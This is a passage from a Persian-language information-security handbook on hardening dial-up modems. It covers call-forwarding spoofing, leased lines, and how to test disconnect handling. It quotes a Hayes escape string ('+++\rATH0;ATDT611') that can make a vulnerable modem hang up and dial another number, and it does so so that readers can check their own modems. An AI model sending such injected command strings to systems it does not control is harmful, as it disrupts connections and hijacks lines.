‫ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺗﻠﻔﻦ ﺷﻤﺎ ﻗﺎﺑﻠﻴﺖ ﻫﺪﺍﻳﺖ ﺗﻤﺎﺱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺩﺭ ﭘﻴﻜﺮﺑﻨﺪﻱ‪ ،‬ﺗﻤﺎﻡ ﺗﻤﺎﺳﻬﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺭﺍ ﺑﻪ‬
‫ﺷﻤﺎﺭﺓ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﻣﻨﺘﻘﻞ ﻛﻨﺪ‪ .‬ﺍﮔﺮ ﺩﺭ ﺍﻳﻦ ﺷﻤﺎﺭﺓ ﺟﺪﻳﺪ‪ ،‬ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﺭﻓﺘﺎﺭ ﺁﻥ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺗﻨﻈﻴﻢ ﺷﺪﻩ ﺑﺎﺷﺪ‪،‬‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﻳﺐ ﺑﺨﻮﺭﻧﺪ ﻭ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ‪.‬‬

‫ﺍﺯ ﺷﺮﻛﺖ ﺗﻠﻔﻦ ﺧﻮﺩ ﺑﺨﻮﺍﻫﻴﺪ ﻗﺎﺑﻠﻴﺖ ﭘﺮﺩﺍﺧﺖ ﺷﺨﺺ ﺛﺎﻟﺚ ﺭﺍ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻏﻴﺮﻓﻌﺎﻝ ﻛﻨﺪ‬
‫ﺑﺪﻭﻥ ﻭﺟﻮﺩ ﻗﺎﺑﻠﻴﺖ ﭘﺮﺩﺍﺧﺖ ﺷﺨﺺ ﺛﺎﻟﺚ‪ ،‬ﺍﻓﺮﺍﺩ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﻫﺰﻳﻨﺔ ﺗﻤﺎﺳﻬﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔﺮﺩﻥ ﺧﻂ ﺗﻠﻔﻦ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻮﺩﻡ ﺷﻤﺎ ﺑﻴﻨﺪﺍﺯﻧﺪ‪.‬‬

‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺧﻂ ﺍﺳﺘﻴﺠﺎﺭﻱ ﻣﺴﺘﻘﻴﻢ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺭﺍ ﻣﺪ ﻧﻈﺮ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‬


‫ﺍﮔﺮ ﻫﻤﺔ ﺍﺳﺘﻔﺎﺩﺓ ﺷﻤﺎ ﺍﺯ ﻣﻮﺩﻡ ﺑﻪ ﻳﻚ ﻣﺤﻞ ﺑﻴﺮﻭﻧﻲ ﺧﺎﺹ ﻣﺮﺑﻮﻁ ﻣﻲﺷﻮﺩ‪ ،‬ﺑﻪ ﻓﻜﺮ ﺍﺟﺎﺭﺓ ﻳﻚ ﺧﻂ ﻣﺴﺘﻘﻴﻢ ﻣﺨﺎﺑﺮﺍﺗﻲ ﺑﺎﺷﻴﺪ‪ .‬ﺧﻄﻮﻁ‬
‫ﺍﺳﺘﻴﺠﺎﺭﻱ ﻣﺴﺘﻘﻴﻢ )‪ ،(leased lines‬ﻣﺪﺍﺭﻫﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻣﻴﺎﻥ ﺩﻭ ﻧﻘﻄﻪ ﻫﺴﺘﻨﺪ ﻛﻪ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ﻣﺨﺎﺑﺮﺍﺕ ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻣﺜﻞ‬
‫ﻛﺎﺑﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﻧﻤﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﺗﻤﺎﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼﻨﻴﻦ ﺧﻄﻲ ﺷﻤﺎ‬
‫ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻧﻴﺪ ﺗﻤﺎﺱ ﺧﻮﺩ ﺑﺎ ﺁﻥ ﺍﺩﺍﺭﺓ ﺑﻴﺮﻭﻧﻲ ﺭﺍ ﺣﻔﻆ ﻛﻨﻴﺪ‪ ،‬ﺍﻣﺎ ﺩﺭﻋﻴﻦ ﺣﺎﻝ ﺍﺟﺎﺯﻩ ﻧﻤﻲﺩﻫﺪ ﻛﺴﻲ ﺑﺎ ﻣﻮﺩﻡ ﺷﻤﺎ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ‬
‫ﻭ ﺳﻌﻲ ﺩﺭ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻧﻤﺎﻳﺪ‪ .‬ﻏﺎﻟﺒﹰﺎ ﺧﻄﻮﻁ ﺍﺳﺘﻴﺠﺎﺭﻱ ﻣﺴﺘﻘﻴﻢ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺍﺯ ﺧﻄﻮﻁ ﻣﻌﻤﻮﻟﻲ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺍﻣﻨﻴﺖ ﺯﻳﺎﺩ ﺁﻧﻬﺎ‬
‫ﻻ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﻩ ﺍﺯ ﻃﺮﻳﻖ‬‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﺟﺒﺮﺍﻥ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺧﻄﻮﻁ ﻳﻚ ﻣﺰﻳﺖ ﺩﻳﮕﺮ ﻫﻢ ﺩﺍﺭﻧﺪ ﻭ ﺁﻥ ﺍﻳﻨﻜﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺁﻧﻬﺎ ﺑﺴﻴﺎﺭ ﺳﺮﻳﻌﺘﺮ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩﻩ ﺍﺯ ﻃﺮﻳﻖ ﺧﻄﻮﻁ ﻣﻌﻤﻮﻟﻲ ﺗﻠﻔﻦ ﺍﺳﺖ‪.‬‬

‫ﺁﺯﻣﻮﺩﻥ ﻣﻮﺩﻣﻬﺎ‬
‫ﭘﺲ ﺍﺯ ﺍﺗﺼﺎﻝ ﻣﻮﺩﻡ‪ ،‬ﺑﺎﻳﺪ ﺗﻮﺍﻧﺎﻳﻲ ﺁﻥ ﺩﺭ ﺑﺮﻗﺮﺍﺭﻱ ﻭ ﺩﺭﻳﺎﻓﺖ ﺗﻤﺎﺱ ﺭﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻴﺎﺯﻣﺎﻳﻴﺪ‪ .‬ﺍﻭﻝ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻮﺩﻡ ﺩﺭ ﺷﺮﺍﻳﻂ‬
‫ﻋﺎﺩﻱ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻋﻤﻞ ﻣﻲﻛﻨﺪ‪ .‬ﭘﺲ ﺍﺯ ﺁﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﺣﺎﺩﺛﺔ ﻏﻴﺮﻣﻨﺘﻈﺮﻩﺍﻱ ﺭﺥ ﻣﻲﺩﻫﺪ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ‬
‫ﻭﺍﻛﻨﺶ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﮔﺮ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﻗﻄﻊ ﺷﻮﺩ‪ ،‬ﺭﺍﻳﺎﻧﻪ ﺑﺎﻳﺪ ﺗﻤﺎﻡ ﭘﺮﺩﺍﺯﻩﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺗﻠﻔﻨﻲ ﺭﺍ ﺍﺯ ﺣﺎﻓﻈﻪ‬
‫ﻭ ﻛﺎﺭﺑﺮ ﻣﺮﺑﻮﻃﻪ ﺭﺍ ﺍﺯ ﺳﻴﺴﺘﻢ ﺧﺎﺭﺝ ﻛﻨﺪ‪ ،‬ﻧﻪ ﺍﻳﻨﻜﻪ ﺍﺟﺎﺯﻩ ﺩﻫﺪ ﺗﻤﺎﺱﮔﻴﺮﻧﺪﺓ ﺑﻌﺪﻱ ﺑﻪ ﺩﺳﺘﻮﺭﭘﺮﺩﺍﺯ‪ ٢٤٢‬ﻛﺎﺭﺑﺮ ﻗﺒﻠﻲ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺑﻴﺸﺘﺮ ﺍﻳﻦ ﺁﺯﻣﺎﻳﺸﻬﺎ ﺑﻤﻨﻈﻮﺭ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﺭﺳﺎﻝ ﺻﺤﻴﺢ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﻛﻨﺘﺮﻟﻲ ﻣﻮﺩﻡ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ )ﺑﻄﻮﺭﻳﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﻤﻮﺍﺭﻩ ﺍﺯ ﺑﺮﻗﺮﺍﺭ ﺑﻮﺩﻥ‬
‫ﺗﻤﺎﺱ ﺍﻃﻼﻉ ﺩﺍﺭﺩ(‪ ،‬ﻭ ﻧﻴﺰ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﺑﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺍﺯ ﺧﻮﺩ ﺭﻓﺘﺎﺭ ﺻﺤﻴﺤﻲ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ‪.‬‬

‫ﺁﺯﻣﻮﻥ ﺷﺮﻭﻉ‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻣﻮﺩﻡ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺗﻨﻈﻴﻢ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﻫﻢ ﺩﺭ ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﻭ ﻫﻢ ﺩﺭ ﺯﻣﺎﻥ ﻗﻄﻊ‬
‫ﺗﻤﺎﺳﻬﺎ‪ ،‬ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﻋﻤﻞ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺁﺯﻣﻮﺩﻥ ﻣﻮﺩﻡ‪ ،‬ﺑﺎﻳﺪ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺩﻳﮕﺮﻱ ﻛﻪ ﺍﺯ ﻗﺒﻞ ﻣﻲﺩﺍﻧﻴﺪ ﺑﺪﺭﺳﺘﻲ ﺭﻓﺘﺎﺭ ﻣﻲﻛﻨﺪ ﺗﻤﺎﺱ‬

‫‪242 Command Interpreter‬‬


‫‪٣٨٣‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺑﮕﻴﺮﻳﺪ‪) .‬ﺑﺎ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺍﺯ ﺁﻥ ﺗﻤﺎﺱ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﻴﺪ ﺗﻤﺎﺱ ﺑﺮﻗﺮﺍﺭ ﻧﺴﺎﺯﻳﺪ؛ ﭼﺮﺍﻛﻪ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﺑﻮﺟﻮﺩ ﺑﻴﺎﻳﺪ ﻣﺘﻮﺟﻪ ﻧﺨﻮﺍﻫﻴﺪ ﺷﺪ ﻛﻪ‬
‫ﺍﺷﻜﺎﻝ ﻛﺎﺭ ﺍﺯ ﻛﺠﺎ ﺍﺳﺖ‪(.‬‬
‫ﻋﻤﻠﻴﺎﺕ ﺁﺯﻣﻮﻥ ﺭﺍ ﺑﺪﻳﻨﺼﻮﺭﺕ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪:‬‬

‫ﺳﻌﻲ ﻛﻨﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺷﺒﻴﻪﺳﺎﺯ ﭘﺎﻳﺎﻧﻪ‪ ،‬ﺑﺎ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﻫﺮ ﺑﺎﺭ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﭘﺎﺳﺦ ﻣﻲﺩﻫﺪ ﻗﺎﻋﺪﺗﹰﺎ‬ ‫‪.١‬‬
‫ﻳﻚ ﺍﻋﻼﻥ ﻭﺭﻭﺩ‪ ٢٤٣‬ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﻴﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺮﺣﻠﻪ ﺷﻤﺎ ﺑﺎﻳﺪ ﻗﺎﺩﺭ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﻭﺍﺭﺩ ﺷﻮﻳﺪ ﻭ ﻃﻮﺭﻱ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ‬
‫ﻛﻨﻴﺪ ﻛﻪ ﮔﻮﻳﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻫﺴﺘﻴﺪ‪.‬‬
‫ﺍﺗﺼﺎﻝ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺑﺎ ﺩﺭﺁﻭﺭﺩﻥ ﺳﻴﻢ ﺗﻠﻔﻦ ﺍﺯ ﻣﻮﺩﻣﻲ ﻛﻪ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻛﺮﺩﻩ ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﺑﺮﻧﺎﻣﺔ ﭘﺎﻳﺎﻧﻪ ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ‬ ‫‪.٢‬‬
‫ﻗﻄﻊﺷﺪﻥ ﺍﺗﺼﺎﻝ ﺑﺸﻮﺩ‪.‬‬
‫ﺑﺎﺭ ﺩﻳﮕﺮ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﻭ ﺑﺎ ﺧﺎﻣﻮﺵ ﻛﺮﺩﻥ ﻣﻮﺩﻡ ﺍﺗﺼﺎﻝ ﺭﺍ ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﻣﺠﺪﺩﹰﺍ ﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﻣﺘﻮﺟﻪ ﻣﻮﺿﻮﻉ ﺑﺸﻮﺩ‪.‬‬ ‫‪.٣‬‬
‫ﻣﺠﺪﺩﹰﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺍﻳﻨﺒﺎﺭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﻪ ﺍﺗﺼﺎﻝ ﺗﻠﻔﻨﻲ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪ ﺧﺎﺭﺝ ﺷﻮﻳﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﻣﻮﺩﻡ ﺑﺎﻳﺪ‬ ‫‪.٤‬‬
‫ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﻗﻄﻊ ﻛﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﺁﺧﺮﻳﻦ ﺑﺎﺭ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ‪ .‬ﺍﻳﻨﺒﺎﺭ ﺍﺗﺼﺎﻝ ﺭﺍ ﺑﺼﻮﺭﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﺑﺎ ‪ kill‬ﻛﺮﺩﻥ ﭘﺮﺩﺍﺯﺓ ﭘﺎﻳﺎﻧﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ )ﻳﺎ‬ ‫‪.٥‬‬
‫ﺍﺯ ﭘﺎﻳﺎﻧﻪﺍﻱ ﺩﻳﮕﺮ ﻭ ﻳﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ‪ Task Manager‬ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺤﺖ ‪ (Windows‬ﻗﻄﻊ ﻛﻨﻴﺪ‪ .‬ﺑﺎﺯ ﻫﻢ ﻣﻮﺩﻡ ﺑﺎﻳﺪ ﺑﻄﻮﺭ ﺧﻮﺩﻛﺎﺭ‬
‫ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺭﺍﻳﺎﻧﺔ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﻗﻄﻊ ﻧﻤﺎﻳﺪ‪.‬‬
‫ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻛﻨﺘﺮﻝ ﻛﻨﻴﺪ ﺑﻪ ﺷﺮﺡ ﺯﻳﺮ ﻫﺴﺘﻨﺪ‪:‬‬

‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺣﺎﻟﺖ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻮﺩﻡ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﺭﺷﺘﻪﻫﺎﻱ ﻓﺮﺍﺭ‪ ٢٤٤‬ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﻳﻚ ﺭﺷﺘﺔ‬ ‫•‬
‫ﻼ ﺑﻴﺸﺘﺮ‬
‫ﻓﺮﺍﺭ‪ ،‬ﺩﻧﺒﺎﻟﻪﺍﻱ ﺍﺯ ﻛﺎﺭﺍﻛﺘﺮﻫﺎ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺷﻤﺎ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻝ ﻣﻮﺩﻡ ﺭﺍ ﺑﺪﺳﺖ ﮔﺮﻓﺘﻪ ﻭ ﺁﻧﺮﺍ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻛﻨﻴﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻣﻮﺩﻣﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﺳﺮﻱ ﺩﺳﺘﻮﺭﺍﺕ "‪) "AT‬ﻛﻪ ﺗﻮﺳﻂ ﺷﺮﻛﺖ ﺳﺎﺯﻧﺪﺓ ﻣﻮﺩﻡ ‪ Hayes‬ﻃﺮﺍﺣﻲ ﺷﺪﻩ( ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﻭﻗﻔﺔ‬
‫ﻱ ﺩﻳﮕﺮ‪ ،‬ﺑﻪ ﺣﺎﻟﺖ‬ ‫ﺳﻪﺛﺎﻧﻴﻪﺍﻱ‪ ،‬ﺍﺭﺳﺎﻝ ﺳﻪ ﻋﻼﻣﺖ ﻣﺜﺒﺖ )ﻛﺎﺭﺍﻛﺘﺮ ﭘﻴﺶﻓﺮﺽ ﻓﺮﺍﺭ( ﺑﺼﻮﺭﺕ ﭘﺸﺖ ﺳﺮﻫﻢ؛ ﻭ ﻳﻚ ﻭﻗﻔﺔ ﺳﻪﺛﺎﻧﻴﻪﺍ ﹺ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﺭﻭﻧﺪ‪ .‬ﺍﮔﺮ ﻣﻮﺩﻡ ﺷﻤﺎ ﺩﺭ ﻭﺍﻛﻨﺶ ﺑﻪ ﺍﻳﻦ ﻭﺭﻭﺩﻱ ﭘﺎﺳﺦ "‪ "OK‬ﺑﺪﻫﺪ‪ ،‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺎ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﻗﺎﺑﻞ‬
‫ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﻲﺑﺎﺷﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﻨﺘﺮﻝ ﻣﻮﺩﻡ ﺗﺤﺖ ‪ UNIX‬ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﻣﻮﺩﻡ ﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ‬
‫ﻓﻌﺎﻝ ﻧﺸﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺩﺭﻳﺎﻓﺖ ﺭﺷﺘﺔ "‪ "+++\rATH0;ATDT611‬ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻣﻮﺩﻡ ﺍﺗﺼﺎﻝ ﻓﻌﻠﻲ ﺭﺍ ﻗﻄﻊ‬
‫ﻛﺮﺩﻩ ﻭ ﺑﺎ ﺷﻤﺎﺭﺓ "‪ "٦١١‬ﻛﻪ ﺷﻤﺎﺭﺓ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﺗﻌﻤﻴﺮ ﺗﻠﻔﻦ ﺍﺳﺖ ﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ‪) .‬ﺩﺭ ﺑﺮﺧﻲ ﺍﺯ ﻣﻮﺩﻣﻬﺎ ﺑﺎﻳﺪ ﻣﻴﺎﻥ "‪ "+++‬ﻭ "‪ "\r‬ﻳﻚ ﻣﻜﺚ‬
‫ﺳﻪﺛﺎﻧﻴﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﺑﺮﺧﻲ ﺧﻴﺮ‪ ،‬ﭼﺮﺍﻛﻪ ﻓﺎﺻﻠﺔ ﺳﻪﺛﺎﻧﻴﻪﺍﻱ ﺗﻮﺳﻂ ‪ Hayes‬ﺑﻪ ﺛﺒﺖ ﺭﺳﻴﺪﻩ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﻮﺩﻡ ﺗﺼﻤﻴﻢ ﮔﺮﻓﺘﻪﺍﻧﺪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻛﻪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨﺪ‪(.‬‬


‫ﭼﻨﺎﻧﭽﻪ ﻗﺎﺑﻠﻴﺖ ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﻣﻮﺩﻡ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻴﺴﺖ‪ ،‬ﻣﺴﺘﻨﺪﺍﺕ ﻣﻮﺩﻡ ﺧﻮﺩ ﺭﺍ ﺑﺨﻮﺍﻧﻴﺪ ﻭ ﻳﺎ ﺑﺎ ﻓﺮﻭﺷﻨﺪﺓ ﺁﻥ ﺗﻤﺎﺱ ﺑﮕﻴﺮﻳﺪ ﺗﺎ ﺭﻭﺵ‬
‫ﻏﻴﺮﻓﻌﺎﻝ ﻛﺮﺩﻥ ﺁﻧﺮﺍ ﺑﻴﺎﻣﻮﺯﻳﺪ‪ .‬ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﮔﺎﻡ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺠﺒﻮﺭ ﺷﻮﻳﺪ ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻳﻲ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﺩﻡ ﺧﻮﺩ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪.‬‬

‫ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ ﻛﻪ ﺁﻳﺎ ﻣﻮﺩﻡ ﺩﺳﺘﺮﺳﻴﻬﺎﻱ ﻫﻤﺰﻣﺎﻥ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ ﻳﺎ ﺧﻴﺮ‪ .‬ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻫﻴﭻ ﺭﺍﻫﻲ ﺑﺮﺍﻱ‬ ‫•‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻪ ﻣﻮﺩﻣﻲ ﻛﻪ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻛﺎﺭﺑﺮ ﺩﻳﮕﺮﻱ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﻳﺎﺑﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﭘﺲ ﺍﺯ ﻗﻄﻊﺷﺪﻥ ﺗﻠﻔﻦ‪ ،‬ﺑﺮﻧﺎﻣﺔ ﭘﺎﻳﺎﻧﻪ ﺍﺯ ﺣﺎﻓﻈﻪ ﺧﺎﺭﺝ ﻧﺸﻮﺩ ﻭ ﻳﺎ ﺍﮔﺮ ﺑﺎ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺭﺷﺘﺔ ﻓﺮﺍﺭ ﺍﻣﻜﺎﻥ ﺑﺎﺯﮔﺸﺖ ﻣﻮﺩﻡ ﺑﻪ ﺣﺎﻟﺖ‬
